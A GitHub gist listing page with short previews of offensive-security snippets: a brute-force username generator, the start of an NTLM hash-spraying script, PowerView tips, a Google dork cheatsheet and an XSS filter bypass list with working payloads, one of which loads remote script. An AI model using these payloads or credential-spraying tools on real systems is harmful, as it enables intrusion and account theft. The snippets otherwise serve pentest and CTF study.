Skip to content

Instantly share code, notes, and snippets.

View Papadope-zz's full-sized avatar
🔐
Pentesting, Privesc, CyberSec, CTF rn On #THM #HTB & #CTFtime

Chris Papadopoulos Papadope-zz

🔐
Pentesting, Privesc, CyberSec, CTF rn On #THM #HTB & #CTFtime
77 followers · 150 following
View GitHub Profile
@Papadope-zz
Papadope-zz / namemash.py
Created December 27, 2021 15:47 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python
import sys
import os.path
if __name__ == "__main__":
if len(sys.argv) != 2:
print("usage: {} names.txt".format((sys.argv[0])))
sys.exit(0)
if not os.path.exists(sys.argv[1]):
@0xjbb
0xjbb / tgtspray.sh
Last active December 25, 2020 01:09
TGTSpray. A tool to spray hashes when smb/winrm lock you out :(
#!/usr/bin/bash
# made by 0xjb, definitely not made for any ctf boxes
# Hash spraying when crackmapexec locks you out :(
# Is it good? no
# Did it work for me in a time of need? yes.
# Will it work for you? ¯\_(ツ)_/¯
if [ "$#" -ne 2 ];then
echo "Usage: $0 <DOMAIN/User> <File of NTLM hashes 'hash:hash'>"
@muff-in
muff-in / resources.md
Last active June 26, 2025 21:12
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@CMNatic
CMNatic / cloudSettings
Last active October 5, 2023 19:22
TryHackMe OWASP-10-A8: Insecure Deserialization RCE PoC
{"lastUpload":"2021-08-31T08:20:42.057Z","extensionVersion":"v3.4.3"}
@sundowndev
sundowndev / GoogleDorking.md
Last active July 4, 2025 12:48
Google dork cheatsheet

Google dork cheatsheet

Search filters

Filter Description Example
allintext Searches for occurrences of all the keywords given. allintext:"keyword"
intext Searches for the occurrences of keywords all at once or one at a time. intext:"keyword"
inurl Searches for a URL matching one of the keywords. inurl:"keyword"
allinurl Searches for a URL matching all the keywords in the query. allinurl:"keyword"
intitle Searches for occurrences of keywords in title all or one. intitle:"keyword"
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active June 27, 2025 13:46
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active June 30, 2025 11:50
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@superkojiman
superkojiman / namemash.py
Last active June 30, 2025 16:23
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active July 3, 2025 16:10
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname